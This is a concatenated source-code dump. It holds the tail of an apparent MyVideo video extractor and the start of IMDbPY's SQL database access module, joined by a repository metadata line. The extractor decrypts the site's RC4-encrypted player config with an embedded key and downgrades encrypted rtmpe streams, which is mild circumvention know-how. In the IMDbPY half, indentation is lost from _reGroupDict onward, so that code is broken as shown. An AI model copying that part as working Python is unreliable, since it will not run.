        mobj = re.search('source src=\'(.+?)[.]([^.]+)\'', webpage)
        if mobj is not None:
            self.report_extraction(video_id)
            video_url = mobj.group(1) + '.flv'

            video_title = self._html_search_regex('<title>([^<]+)</title>',
                                                  webpage, 'title')

            return {
                'id': video_id,
                'url': video_url,
                'title': video_title,
            }

        # Strategy 2: JSON config service referenced by the page
        # (response is base64-encoded JSON).
        mobj = re.search(r'data-video-service="/service/data/video/%s/config' % video_id, webpage)
        if mobj is not None:
            request = sanitized_Request('http://www.myvideo.de/service/data/video/%s/config' % video_id, '')
            response = self._download_webpage(request, video_id,
                                              'Downloading video info')
            info = json.loads(base64.b64decode(response).decode('utf-8'))
            return {
                'id': video_id,
                'title': info['title'],
                # Prefer plain rtmpt over encrypted rtmpe transport.
                'url': info['streaming_url'].replace('rtmpe', 'rtmpt'),
                'play_path': info['filename'],
                'ext': 'flv',
                'thumbnail': info['thumbnail'][0]['url'],
            }

        # Strategy 3: the RC4-encrypted XML configuration ("encxml").
        # try encxml
        mobj = re.search('var flashvars={(.+?)}', webpage)
        if mobj is None:
            raise ExtractorError('Unable to extract video')
        params = {}
        encxml = ''
        sec = mobj.group(1)
        # Collect the flashvars key/value pairs; '_encxml' holds the
        # (urlencoded) URL of the encrypted configuration.
        for (a, b) in re.findall('(.+?):\'(.+?)\',?', sec):
            if not a == '_encxml':
                params[a] = b
            else:
                encxml = compat_urllib_parse_unquote(b)
        if not params.get('domain'):
            params['domain'] = 'www.myvideo.de'
        xmldata_url = '%s?%s' % (encxml, compat_urllib_parse_urlencode(params))
        if 'flash_playertype=MTV' in xmldata_url:
            self._downloader.report_warning('avoiding MTV player')
            xmldata_url = (
                'http://www.myvideo.de/dynamic/get_player_video_xml.php'
                '?flash_playertype=D&ID=%s&_countlimit=4&autorun=yes'
            ) % video_id

        # get enc data
        enc_data = self._download_webpage(xmldata_url, video_id).split('=')[1]
        enc_data_b = binascii.unhexlify(enc_data)
        # RC4 key = md5(b64decode(b64decode(GK)) + md5(video_id)).
        sk = self.__md5(
            base64.b64decode(base64.b64decode(GK)) +
            self.__md5(
                str(video_id).encode('utf-8')
            )
        )
        dec_data = self.__rc4crypt(enc_data_b, sk)

        # extracting infos
        self.report_extraction(video_id)

        video_url = None
        mobj = re.search('connectionurl=\'(.*?)\'', dec_data)
        if mobj:
            video_url = compat_urllib_parse_unquote(mobj.group(1))
            if 'myvideo2flash' in video_url:
                self.report_warning(
                    'Rewriting URL to use unencrypted rtmp:// ...',
                    video_id)
                video_url = video_url.replace('rtmpe://', 'rtmp://')

        if not video_url:
            # extract non rtmp videos
            mobj = re.search('path=\'(http.*?)\' source=\'(.*?)\'', dec_data)
            if mobj is None:
                raise ExtractorError('unable to extract url')
            video_url = compat_urllib_parse_unquote(mobj.group(1)) + compat_urllib_parse_unquote(mobj.group(2))

        video_file = self._search_regex('source=\'(.*?)\'', dec_data, 'video file')
        video_file = compat_urllib_parse_unquote(video_file)

        # RTMP play_path is "<extension>:<path>" unless the file is f4m.
        if not video_file.endswith('f4m'):
            ppath, prefix = video_file.split('.')
            video_playpath = '%s:%s' % (prefix, ppath)
        else:
            video_playpath = ''

        video_swfobj = self._search_regex(r'swfobject.embedSWF\(\'(.+?)\'', webpage, 'swfobj')
        video_swfobj = compat_urllib_parse_unquote(video_swfobj)

        video_title = self._html_search_regex("<h1(?: class='globalHd')?>(.*?)</h1>",
                                              webpage, 'title')

        return {
            'id': video_id,
            'url': video_url,
            'tc_url': video_url,
            'title': video_title,
            'ext': 'flv',
            'play_path': video_playpath,
            'player_url': video_swfobj,
        }
| gpl-3.0 |
jackkiej/SickRage | lib/imdb/parser/sql/__init__.py | 67 | 66238 | """
parser.sql package (imdb package).
This package provides the IMDbSqlAccessSystem class used to access
IMDb's data through a SQL database. Every database supported by
the SQLObject _AND_ SQLAlchemy Object Relational Managers is available.
the imdb.IMDb function will return an instance of this class when
called with the 'accessSystem' argument set to "sql", "database" or "db".
Copyright 2005-2012 Davide Alberani <da@erlug.linux.it>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
# FIXME: this whole module was written in a veeery short amount of time.
# The code should be commented, rewritten and cleaned. :-)
import re
import logging
from difflib import SequenceMatcher
from codecs import lookup
from imdb import IMDbBase
from imdb.utils import normalizeName, normalizeTitle, build_title, \
build_name, analyze_name, analyze_title, \
canonicalTitle, canonicalName, re_titleRef, \
build_company_name, re_episodes, _unicodeArticles, \
analyze_company_name, re_year_index, re_nameRef
from imdb.Person import Person
from imdb.Movie import Movie
from imdb.Company import Company
from imdb._exceptions import IMDbDataAccessError, IMDbError
# Logger for miscellaneous functions.
_aux_logger = logging.getLogger('imdbpy.parser.sql.aux')

# =============================
# Things that once upon a time were in imdb.parser.common.locsql.

def titleVariations(title, fromPtdf=0):
    """Build title variations useful for searches; if fromPtdf is true,
    the input is assumed to be in the plain text data files format.

    Returns a (title1, title2, title3) tuple: the canonical title, the
    canonical title without a leading article (u'' when identical to
    title1) and the long imdb canonical title (u'' when not built)."""
    if fromPtdf: title1 = u''
    else: title1 = title
    title2 = title3 = u''
    if fromPtdf or re_year_index.search(title):
        # If it appears to have a (year[/imdbIndex]) indication,
        # assume that a long imdb canonical name was provided.
        titldict = analyze_title(title, canonical=1)
        # title1: the canonical name.
        title1 = titldict['title']
        if titldict['kind'] != 'episode':
            # title3: the long imdb canonical name.
            if fromPtdf: title3 = title
            else: title3 = build_title(titldict, canonical=1, ptdf=1)
        else:
            title1 = normalizeTitle(title1)
            title3 = build_title(titldict, canonical=1, ptdf=1)
    else:
        # Just a title.
        # title1: the canonical title.
        title1 = canonicalTitle(title)
        title3 = u''
    # title2 is title1 without the article, or title1 unchanged.
    if title1:
        title2 = title1
        t2s = title2.split(u', ')
        if t2s[-1].lower() in _unicodeArticles:
            title2 = u', '.join(t2s[:-1])
    _aux_logger.debug('title variations: 1:[%s] 2:[%s] 3:[%s]',
                      title1, title2, title3)
    return title1, title2, title3
# Matches a roman-numeral imdbIndex marker like "(I)" inside a name.
re_nameIndex = re.compile(r'\(([IVXLCDM]+)\)')

def nameVariations(name, fromPtdf=0):
    """Build name variations useful for searches; if fromPtdf is true,
    the input is assumed to be in the plain text data files format.

    Returns a (name1, name2, name3) tuple: the canonical name, the
    normalized name (u'' when identical to name1) and the long imdb
    canonical name (u'' when not built)."""
    name1 = name2 = name3 = u''
    if fromPtdf or re_nameIndex.search(name):
        # We've a name with an (imdbIndex)
        namedict = analyze_name(name, canonical=1)
        # name1 is the name in the canonical format.
        name1 = namedict['name']
        # name3 is the canonical name with the imdbIndex.
        if fromPtdf:
            if namedict.has_key('imdbIndex'):
                name3 = name
        else:
            name3 = build_name(namedict, canonical=1)
    else:
        # name1 is the name in the canonical format.
        name1 = canonicalName(name)
        name3 = u''
    # name2 is the name in the normal format, if it differs from name1.
    name2 = normalizeName(name1)
    if name1 == name2: name2 = u''
    _aux_logger.debug('name variations: 1:[%s] 2:[%s] 3:[%s]',
                      name1, name2, name3)
    return name1, name2, name3
# Prefer the optional C implementation of the similarity measure; fall
# back to a pure-Python version built on difflib.SequenceMatcher.
try:
    from cutils import ratcliff as _ratcliff
    def ratcliff(s1, s2, sm):
        """Return the Ratcliff-Obershelp value between the two strings,
        using the C implementation."""
        # `sm` is accepted (and ignored) for API compatibility with the
        # pure-Python fallback below.
        return _ratcliff(s1.encode('latin_1', 'replace'),
                         s2.encode('latin_1', 'replace'))
except ImportError:
    _aux_logger.warn('Unable to import the cutils.ratcliff function.'
                     ' Searching names and titles using the "sql"'
                     ' data access system will be slower.')

    def ratcliff(s1, s2, sm):
        """Ratcliff-Obershelp similarity.

        `sm` is a SequenceMatcher whose first sequence was already set
        by the caller (to s1 lower-cased); only seq2 is updated here."""
        # Strings whose lengths differ too much can't be similar enough:
        # short-circuit to 0.0 without running the expensive ratio().
        STRING_MAXLENDIFFER = 0.7
        s1len = len(s1)
        s2len = len(s2)
        if s1len < s2len:
            threshold = float(s1len) / s2len
        else:
            threshold = float(s2len) / s1len
        if threshold < STRING_MAXLENDIFFER:
            return 0.0
        sm.set_seq2(s2.lower())
        return sm.ratio()
def merge_roles(mop):
    """Collapse duplicate movie/person entries, accumulating their roles.

    Items that compare equal are merged into the first occurrence, whose
    currentRole becomes a list holding every merged role."""
    merged = []
    for entry in mop:
        try:
            idx = merged.index(entry)
        except ValueError:
            # First time this item is seen: keep it as-is.
            merged.append(entry)
            continue
        kept = merged[idx]
        if not isinstance(kept.currentRole, list):
            kept.currentRole = [kept.currentRole]
        kept.currentRole.append(entry.currentRole)
    return merged
def scan_names(name_list, name1, name2, name3, results=0, ro_thresold=None,
                _scan_character=False):
    """Scan a list of names, searching for best matches against
    the given variations.

    name_list is an iterable of (ID, name_data_dict) pairs; name1/2/3
    are the variations built by nameVariations().  Returns a list of
    (ratio, (ID, name_data)) items sorted best-first, truncated to
    `results` items when results > 0."""
    # NOTE: 'ro_thresold' (sic) keeps the historical misspelled name.
    if ro_thresold is not None: RO_THRESHOLD = ro_thresold
    else: RO_THRESHOLD = 0.6
    sm1 = SequenceMatcher()
    sm2 = SequenceMatcher()
    sm3 = SequenceMatcher()
    sm1.set_seq1(name1.lower())
    if name2: sm2.set_seq1(name2.lower())
    if name3: sm3.set_seq1(name3.lower())
    resd = {}
    for i, n_data in name_list:
        nil = n_data['name']
        # XXX: on Symbian, here we get a str; not sure this is the
        #      right place to fix it.
        if isinstance(nil, str):
            nil = unicode(nil, 'latin1', 'ignore')
        # Distance with the canonical name (with a small bonus).
        ratios = [ratcliff(name1, nil, sm1) + 0.05]
        namesurname = u''
        if not _scan_character:
            # Person names are stored as "Surname, Name".
            nils = nil.split(', ', 1)
            surname = nils[0]
            if len(nils) == 2: namesurname = '%s %s' % (nils[1], surname)
        else:
            # Character names are stored as "Name Surname".
            nils = nil.split(' ', 1)
            surname = nils[-1]
            namesurname = nil
        if surname != nil:
            # Distance with the "Surname" in the database.
            ratios.append(ratcliff(name1, surname, sm1))
            if not _scan_character:
                ratios.append(ratcliff(name1, namesurname, sm1))
            if name2:
                ratios.append(ratcliff(name2, surname, sm2))
                # Distance with the "Name Surname" in the database.
                if namesurname:
                    ratios.append(ratcliff(name2, namesurname, sm2))
        if name3:
            # Distance with the long imdb canonical name (bigger bonus).
            ratios.append(ratcliff(name3,
                        build_name(n_data, canonical=1), sm3) + 0.1)
        ratio = max(ratios)
        if ratio >= RO_THRESHOLD:
            # Keep only the best ratio seen so far for each ID.
            if resd.has_key(i):
                if ratio > resd[i][0]: resd[i] = (ratio, (i, n_data))
            else: resd[i] = (ratio, (i, n_data))
    res = resd.values()
    res.sort()
    res.reverse()
    if results > 0: res[:] = res[:results]
    return res
def scan_titles(titles_list, title1, title2, title3, results=0,
                searchingEpisode=0, onlyEpisodes=0, ro_thresold=None):
    """Scan a list of titles, searching for best matches against
    the given variations.

    titles_list is an iterable of (ID, title_data_dict) pairs; title1/2/3
    are the variations built by titleVariations().  Returns a list of
    (ratio, (ID, title_data)) items sorted best-first, truncated to
    `results` items when results > 0."""
    # NOTE: 'ro_thresold' (sic) keeps the historical misspelled name.
    if ro_thresold is not None: RO_THRESHOLD = ro_thresold
    else: RO_THRESHOLD = 0.6
    sm1 = SequenceMatcher()
    sm2 = SequenceMatcher()
    sm3 = SequenceMatcher()
    sm1.set_seq1(title1.lower())
    sm2.set_seq2(title2.lower())
    if title3:
        sm3.set_seq1(title3.lower())
        # A long imdb canonical episode title ends with "{...}".
        if title3[-1] == '}': searchingEpisode = 1
    # hasArt: the searched title carries a trailing article.
    hasArt = 0
    if title2 != title1: hasArt = 1
    resd = {}
    for i, t_data in titles_list:
        if onlyEpisodes:
            # Episode-only mode: compare just the bare title, stripping
            # a trailing "(...)" (e.g. a date) if present.
            if t_data.get('kind') != 'episode':
                continue
            til = t_data['title']
            if til[-1] == ')':
                dateIdx = til.rfind('(')
                if dateIdx != -1:
                    til = til[:dateIdx].rstrip()
            if not til:
                continue
            ratio = ratcliff(title1, til, sm1)
            if ratio >= RO_THRESHOLD:
                resd[i] = (ratio, (i, t_data))
            continue
        # Keep episodes and non-episodes apart.
        if searchingEpisode:
            if t_data.get('kind') != 'episode': continue
        elif t_data.get('kind') == 'episode': continue
        til = t_data['title']
        # XXX: on Symbian, here we get a str; not sure this is the
        #      right place to fix it.
        if isinstance(til, str):
            til = unicode(til, 'latin1', 'ignore')
        # Distance with the canonical title (with or without article).
        #   titleS -> titleR
        #   titleS, the -> titleR, the
        if not searchingEpisode:
            til = canonicalTitle(til)
            ratios = [ratcliff(title1, til, sm1) + 0.05]
            # til2 is til without the article, if present.
            til2 = til
            tils = til2.split(', ')
            matchHasArt = 0
            if tils[-1].lower() in _unicodeArticles:
                til2 = ', '.join(tils[:-1])
                matchHasArt = 1
            if hasArt and not matchHasArt:
                # titleS[, the] -> titleR
                ratios.append(ratcliff(title2, til, sm2))
            elif matchHasArt and not hasArt:
                # titleS -> titleR[, the]
                ratios.append(ratcliff(title1, til2, sm1))
        else:
            ratios = [0.0]
        if title3:
            # Distance with the long imdb canonical title (bigger bonus).
            ratios.append(ratcliff(title3,
                        build_title(t_data, canonical=1, ptdf=1), sm3) + 0.1)
        ratio = max(ratios)
        if ratio >= RO_THRESHOLD:
            # Keep only the best ratio seen so far for each ID.
            if resd.has_key(i):
                if ratio > resd[i][0]:
                    resd[i] = (ratio, (i, t_data))
            else: resd[i] = (ratio, (i, t_data))
    res = resd.values()
    res.sort()
    res.reverse()
    if results > 0: res[:] = res[:results]
    return res
def scan_company_names(name_list, name1, results=0, ro_thresold=None):
    """Scan a list of company names, searching for best matches against
    the given name. Notice that this function takes a list of
    strings, and not a list of dictionaries.

    Returns a list of (ratio, (ID, analyzed_company_name)) items sorted
    best-first, truncated to `results` items when results > 0."""
    # NOTE: 'ro_thresold' (sic) keeps the historical misspelled name.
    if ro_thresold is not None: RO_THRESHOLD = ro_thresold
    else: RO_THRESHOLD = 0.6
    sm1 = SequenceMatcher()
    sm1.set_seq1(name1.lower())
    resd = {}
    # True when the searched name carries no trailing "[country]" code.
    withoutCountry = not name1.endswith(']')
    for i, n in name_list:
        # XXX: on Symbian, here we get a str; not sure this is the
        #      right place to fix it.
        if isinstance(n, str):
            n = unicode(n, 'latin1', 'ignore')
        o_name = n
        var = 0.0
        if withoutCountry and n.endswith(']'):
            # The query has no country code: strip "[xx]" from the
            # candidate and apply a small penalty for the mismatch.
            cidx = n.rfind('[')
            if cidx != -1:
                n = n[:cidx].rstrip()
                var = -0.05
        # Distance with the company name.
        ratio = ratcliff(name1, n, sm1) + var
        if ratio >= RO_THRESHOLD:
            # Keep only the best ratio seen so far for each ID.
            if resd.has_key(i):
                if ratio > resd[i][0]: resd[i] = (ratio,
                                            (i, analyze_company_name(o_name)))
            else:
                resd[i] = (ratio, (i, analyze_company_name(o_name)))
    res = resd.values()
    res.sort()
    res.reverse()
    if results > 0: res[:] = res[:results]
    return res
# Prefer the optional C implementation of soundex; fall back to a
# pure-Python soundex-like phonetic code.
try:
    from cutils import soundex
except ImportError:
    _aux_logger.warn('Unable to import the cutils.soundex function.'
                     ' Searches of movie titles and person names will be'
                     ' a bit slower.')

    # Consonant -> soundex digit class mapping (vowels and unmapped
    # letters fall back to '0' and are skipped).
    _translate = dict(B='1', C='2', D='3', F='1', G='2', J='2', K='2', L='4',
                      M='5', N='5', P='1', Q='2', R='6', S='2', T='3', V='1',
                      X='2', Z='2')
    _translateget = _translate.get
    # Strips the leading run of non-ASCII-letter characters.
    _re_non_ascii = re.compile(r'^[^a-z]*', re.I)
    SOUNDEX_LEN = 5

    def soundex(s):
        """Return the soundex code for the given string, or None when no
        usable ASCII letters are found."""
        # Maximum length of the soundex code.
        s = _re_non_ascii.sub('', s)
        if not s: return None
        s = s.upper()
        # First letter is kept verbatim; the rest become digit classes,
        # collapsing consecutive duplicates.
        soundCode = s[0]
        for c in s[1:]:
            cw = _translateget(c, '0')
            if cw != '0' and soundCode[-1] != cw:
                soundCode += cw
        return soundCode[:SOUNDEX_LEN] or None
def _sortKeywords(keyword, kwds):
    """Rank candidate keywords by similarity to the searched keyword.

    Prefix matches get a strong boost; substring matches (only checked
    for keywords longer than 4 characters) a smaller one.  Best matches
    come first."""
    matcher = SequenceMatcher()
    matcher.set_seq1(keyword.lower())
    boost_contained = len(keyword) > 4
    scored = []
    for cand in kwds:
        score = ratcliff(keyword, cand, matcher)
        if cand.startswith(keyword):
            score += 0.5
        elif boost_contained and keyword in cand:
            score += 0.3
        scored.append((score, cand))
    scored.sort()
    scored.reverse()
    return [cand for _score, cand in scored]
def filterSimilarKeywords(keyword, kwdsIterator):
    """Return a sorted list of keywords similar to the one given.

    kwdsIterator yields (movieID, keyword) pairs; duplicates are
    skipped, candidates are kept when they contain the searched keyword
    (for keywords longer than 4 chars) or share its soundex code, and
    the survivors are ranked by _sortKeywords()."""
    seenDict = {}
    kwdSndx = soundex(keyword.encode('ascii', 'ignore'))
    matches = []
    # Bound method cached locally for speed inside the loop.
    matchesappend = matches.append
    checkContained = False
    if len(keyword) > 4:
        checkContained = True
    for movieID, key in kwdsIterator:
        if key in seenDict:
            continue
        seenDict[key] = None
        if checkContained and keyword in key:
            matchesappend(key)
            continue
        if kwdSndx == soundex(key.encode('ascii', 'ignore')):
            matchesappend(key)
    return _sortKeywords(keyword, matches)
# =============================
# Flat database info labels that get regrouped (via _reGroupDict) under
# the 'literature' and 'business' sections of a movie's data.
_litlist = ['screenplay/teleplay', 'novel', 'adaption', 'book',
            'production process protocol', 'interviews',
            'printed media reviews', 'essays', 'other literature']
_litd = dict([(x, ('literature', x)) for x in _litlist])

_buslist = ['budget', 'weekend gross', 'gross', 'opening weekend', 'rentals',
            'admissions', 'filming dates', 'production dates', 'studios',
            'copyright holder']
_busd = dict([(x, ('business', x)) for x in _buslist])
def _reGroupDict(d, newgr):
"""Regroup keys in the d dictionary in subdictionaries, based on
the scheme in the newgr dictionary.
E.g.: in the newgr, an entry 'LD label': ('laserdisc', 'label')
tells the _reGroupDict() function to take the entry with
label 'LD label' (as received from the sql database)
and put it in the subsection (another dictionary) named
'laserdisc', using the key 'label'."""
r = {}
newgrks = newgr.keys()
for k, v in d.items():
if k in newgrks:
r.setdefault(newgr[k][0], {})[newgr[k][1]] = v
# A not-so-clearer version:
##r.setdefault(newgr[k][0], {})
##r[newgr[k][0]][newgr[k][1]] = v
else: r[k] = v
return r
def _groupListBy(l, index):
"""Regroup items in a list in a list of lists, grouped by
the value at the given index."""
tmpd = {}
for item in l:
tmpd.setdefault(item[index], []).append(item)
res = tmpd.values()
return res
def sub_dict(d, keys):
    """Return the subdictionary of 'd', restricted to the given 'keys'
    (keys missing from 'd' are silently skipped)."""
    result = {}
    for key in keys:
        if key in d:
            result[key] = d[key]
    return result
def get_movie_data(movieID, kindDict, fromAka=0, _table=None):
    """Return a dictionary containing data about the given movieID;
    if fromAka is true, the AkaTitle table is searched; _table is
    reserved for the imdbpy2sql.py script."""
    # Title/AkaTitle are ORM table classes injected into the module
    # globals at runtime by IMDbSqlAccessSystem.__init__.
    if _table is not None:
        Table = _table
    else:
        if not fromAka: Table = Title
        else: Table = AkaTitle
    try:
        m = Table.get(movieID)
    except Exception, e:
        # Best-effort: log and return an empty dict on any ORM failure.
        _aux_logger.warn('Unable to fetch information for movieID %s: %s', movieID, e)
        mdict = {}
        return mdict
    mdict = {'title': m.title, 'kind': kindDict[m.kindID],
             'year': m.productionYear, 'imdbIndex': m.imdbIndex,
             'season': m.seasonNr, 'episode': m.episodeNr}
    if not fromAka:
        if m.seriesYears is not None:
            mdict['series years'] = unicode(m.seriesYears)
    # Drop unset values; coerce year/season/episode to int when possible.
    if mdict['imdbIndex'] is None: del mdict['imdbIndex']
    if mdict['year'] is None: del mdict['year']
    else:
        try:
            mdict['year'] = int(mdict['year'])
        except (TypeError, ValueError):
            del mdict['year']
    if mdict['season'] is None: del mdict['season']
    else:
        try: mdict['season'] = int(mdict['season'])
        except: pass
    if mdict['episode'] is None: del mdict['episode']
    else:
        try: mdict['episode'] = int(mdict['episode'])
        except: pass
    episodeOfID = m.episodeOfID
    if episodeOfID is not None:
        # Recursively build a Movie object for the parent series.
        ser_dict = get_movie_data(episodeOfID, kindDict, fromAka)
        mdict['episode of'] = Movie(data=ser_dict, movieID=episodeOfID,
                                    accessSystem='sql')
        if fromAka:
            ser_note = AkaTitle.get(episodeOfID).note
            if ser_note:
                mdict['episode of'].notes = ser_note
    return mdict
def _iterKeywords(results):
"""Iterate over (key.id, key.keyword) columns of a selection of
the Keyword table."""
for key in results:
yield key.id, key.keyword
def getSingleInfo(table, movieID, infoType, notAList=False):
    """Return a dictionary in the form {infoType: infoListOrString},
    retrieving a single set of information about a given movie, from
    the specified table.

    Returns {} when the info type is unknown or no rows match; with
    notAList true, only the first value is returned (as a string).
    InfoType and AND are ORM objects injected into the module globals
    at runtime by IMDbSqlAccessSystem.__init__."""
    infoTypeID = InfoType.select(InfoType.q.info == infoType)
    if infoTypeID.count() == 0:
        return {}
    res = table.select(AND(table.q.movieID == movieID,
                           table.q.infoTypeID == infoTypeID[0].id))
    retList = []
    for r in res:
        info = r.info
        note = r.note
        if note:
            # Notes are appended to the value with the '::' separator.
            info += u'::%s' % note
        retList.append(info)
    if not retList:
        return {}
    if not notAList: return {infoType: retList}
    else: return {infoType: retList[0]}
def _cmpTop(a, b, what='top 250 rank'):
"""Compare function used to sort top 250/bottom 10 rank."""
av = int(a[1].get(what))
bv = int(b[1].get(what))
if av == bv:
return 0
return (-1, 1)[av > bv]
def _cmpBottom(a, b):
"""Compare function used to sort top 250/bottom 10 rank."""
return _cmpTop(a, b, what='bottom 10 rank')
class IMDbSqlAccessSystem(IMDbBase):
"""The class used to access IMDb's data through a SQL database."""
accessSystem = 'sql'
_sql_logger = logging.getLogger('imdbpy.parser.sql')
def __init__(self, uri, adultSearch=1, useORM=None, *arguments, **keywords):
"""Initialize the access system."""
IMDbBase.__init__(self, *arguments, **keywords)
if useORM is None:
useORM = ('sqlobject', 'sqlalchemy')
if not isinstance(useORM, (tuple, list)):
if ',' in useORM:
useORM = useORM.split(',')
else:
useORM = [useORM]
self.useORM = useORM
nrMods = len(useORM)
_gotError = False
DB_TABLES = []
for idx, mod in enumerate(useORM):
mod = mod.strip().lower()
try:
if mod == 'sqlalchemy':
from alchemyadapter import getDBTables, NotFoundError, \
setConnection, AND, OR, IN, \
ISNULL, CONTAINSSTRING, toUTF8
elif mod == 'sqlobject':
from objectadapter import getDBTables, NotFoundError, \
setConnection, AND, OR, IN, \
ISNULL, CONTAINSSTRING, toUTF8
else:
self._sql_logger.warn('unknown module "%s"' % mod)
continue
self._sql_logger.info('using %s ORM', mod)
# XXX: look ma'... black magic! It's used to make
# TableClasses and some functions accessible
# through the whole module.
for k, v in [('NotFoundError', NotFoundError),
('AND', AND), ('OR', OR), ('IN', IN),
('ISNULL', ISNULL),
('CONTAINSSTRING', CONTAINSSTRING)]:
globals()[k] = v
self.toUTF8 = toUTF8
DB_TABLES = getDBTables(uri)
for t in DB_TABLES:
globals()[t._imdbpyName] = t
if _gotError:
self._sql_logger.warn('falling back to "%s"' % mod)
break
except ImportError, e:
if idx+1 >= nrMods:
raise IMDbError('unable to use any ORM in %s: %s' % (
str(useORM), str(e)))
else:
self._sql_logger.warn('unable to use "%s": %s' % (mod,
str(e)))
_gotError = True
continue
else:
raise IMDbError('unable to use any ORM in %s' % str(useORM))
# Set the connection to the database.
self._sql_logger.debug('connecting to %s', uri)
try:
self._connection = setConnection(uri, DB_TABLES)
except AssertionError, e:
raise IMDbDataAccessError( \
'unable to connect to the database server; ' + \
'complete message: "%s"' % str(e))
self.Error = self._connection.module.Error
# Maps some IDs to the corresponding strings.
self._kind = {}
self._kindRev = {}
self._sql_logger.debug('reading constants from the database')
try:
for kt in KindType.select():
self._kind[kt.id] = kt.kind
self._kindRev[str(kt.kind)] = kt.id
except self.Error:
# NOTE: you can also get the error, but - at least with
# MySQL - it also contains the password, and I don't
# like the idea to print it out.
raise IMDbDataAccessError( \
'unable to connect to the database server')
self._role = {}
for rl in RoleType.select():
self._role[rl.id] = str(rl.role)
self._info = {}
self._infoRev = {}
for inf in InfoType.select():
self._info[inf.id] = str(inf.info)
self._infoRev[str(inf.info)] = inf.id
self._compType = {}
for cType in CompanyType.select():
self._compType[cType.id] = cType.kind
info = [(it.id, it.info) for it in InfoType.select()]
self._compcast = {}
for cc in CompCastType.select():
self._compcast[cc.id] = str(cc.kind)
self._link = {}
for lt in LinkType.select():
self._link[lt.id] = str(lt.link)
self._moviesubs = {}
# Build self._moviesubs, a dictionary used to rearrange
# the data structure for a movie object.
for vid, vinfo in info:
if not vinfo.startswith('LD '): continue
self._moviesubs[vinfo] = ('laserdisc', vinfo[3:])
self._moviesubs.update(_litd)
self._moviesubs.update(_busd)
self.do_adult_search(adultSearch)
def _findRefs(self, o, trefs, nrefs):
"""Find titles or names references in strings."""
if isinstance(o, (unicode, str)):
for title in re_titleRef.findall(o):
a_title = analyze_title(title, canonical=0)
rtitle = build_title(a_title, ptdf=1)
if trefs.has_key(rtitle): continue
movieID = self._getTitleID(rtitle)
if movieID is None:
movieID = self._getTitleID(title)
if movieID is None:
continue
m = Movie(title=rtitle, movieID=movieID,
accessSystem=self.accessSystem)
trefs[rtitle] = m
rtitle2 = canonicalTitle(a_title.get('title', u''))
if rtitle2 and rtitle2 != rtitle and rtitle2 != title:
trefs[rtitle2] = m
if title != rtitle:
trefs[title] = m
for name in re_nameRef.findall(o):
a_name = analyze_name(name, canonical=1)
rname = build_name(a_name, canonical=1)
if nrefs.has_key(rname): continue
personID = self._getNameID(rname)
if personID is None:
personID = self._getNameID(name)
if personID is None: continue
p = Person(name=rname, personID=personID,
accessSystem=self.accessSystem)
nrefs[rname] = p
rname2 = normalizeName(a_name.get('name', u''))
if rname2 and rname2 != rname:
nrefs[rname2] = p
if name != rname and name != rname2:
nrefs[name] = p
elif isinstance(o, (list, tuple)):
for item in o:
self._findRefs(item, trefs, nrefs)
elif isinstance(o, dict):
for value in o.values():
self._findRefs(value, trefs, nrefs)
return (trefs, nrefs)
def _extractRefs(self, o):
"""Scan for titles or names references in strings."""
trefs = {}
nrefs = {}
try:
return self._findRefs(o, trefs, nrefs)
except RuntimeError, e:
# Symbian/python 2.2 has a poor regexp implementation.
import warnings
warnings.warn('RuntimeError in '
"imdb.parser.sql.IMDbSqlAccessSystem; "
"if it's not a recursion limit exceeded and we're not "
"running in a Symbian environment, it's a bug:\n%s" % e)
return (trefs, nrefs)
def _changeAKAencoding(self, akanotes, akatitle):
"""Return akatitle in the correct charset, as specified in
the akanotes field; if akatitle doesn't need to be modified,
return None."""
oti = akanotes.find('(original ')
if oti == -1: return None
ote = akanotes[oti+10:].find(' title)')
if ote != -1:
cs_info = akanotes[oti+10:oti+10+ote].lower().split()
for e in cs_info:
# excludes some strings that clearly are not encoding.
if e in ('script', '', 'cyrillic', 'greek'): continue
if e.startswith('iso-') and e.find('latin') != -1:
e = e[4:].replace('-', '')
try:
lookup(e)
lat1 = akatitle.encode('latin_1', 'replace')
return unicode(lat1, e, 'replace')
except (LookupError, ValueError, TypeError):
continue
return None
def _buildNULLCondition(self, col, val):
"""Build a comparison for columns where values can be NULL."""
if val is None:
return ISNULL(col)
else:
if isinstance(val, (int, long)):
return col == val
else:
return col == self.toUTF8(val)
def _getTitleID(self, title):
"""Given a long imdb canonical title, returns a movieID or
None if not found."""
td = analyze_title(title)
condition = None
if td['kind'] == 'episode':
epof = td['episode of']
seriesID = [s.id for s in Title.select(
AND(Title.q.title == self.toUTF8(epof['title']),
self._buildNULLCondition(Title.q.imdbIndex,
epof.get('imdbIndex')),
Title.q.kindID == self._kindRev[epof['kind']],
self._buildNULLCondition(Title.q.productionYear,
epof.get('year'))))]
if seriesID:
condition = AND(IN(Title.q.episodeOfID, seriesID),
Title.q.title == self.toUTF8(td['title']),
self._buildNULLCondition(Title.q.imdbIndex,
td.get('imdbIndex')),
Title.q.kindID == self._kindRev[td['kind']],
self._buildNULLCondition(Title.q.productionYear,
td.get('year')))
if condition is None:
condition = AND(Title.q.title == self.toUTF8(td['title']),
self._buildNULLCondition(Title.q.imdbIndex,
td.get('imdbIndex')),
Title.q.kindID == self._kindRev[td['kind']],
self._buildNULLCondition(Title.q.productionYear,
td.get('year')))
res = Title.select(condition)
try:
if res.count() != 1:
return None
except (UnicodeDecodeError, TypeError):
return None
return res[0].id
def _getNameID(self, name):
"""Given a long imdb canonical name, returns a personID or
None if not found."""
nd = analyze_name(name)
res = Name.select(AND(Name.q.name == self.toUTF8(nd['name']),
self._buildNULLCondition(Name.q.imdbIndex,
nd.get('imdbIndex'))))
try:
c = res.count()
if res.count() != 1:
return None
except (UnicodeDecodeError, TypeError):
return None
return res[0].id
def _normalize_movieID(self, movieID):
"""Normalize the given movieID."""
try:
return int(movieID)
except (ValueError, OverflowError):
raise IMDbError('movieID "%s" can\'t be converted to integer' % \
movieID)
def _normalize_personID(self, personID):
"""Normalize the given personID."""
try:
return int(personID)
except (ValueError, OverflowError):
raise IMDbError('personID "%s" can\'t be converted to integer' % \
personID)
def _normalize_characterID(self, characterID):
"""Normalize the given characterID."""
try:
return int(characterID)
except (ValueError, OverflowError):
raise IMDbError('characterID "%s" can\'t be converted to integer' \
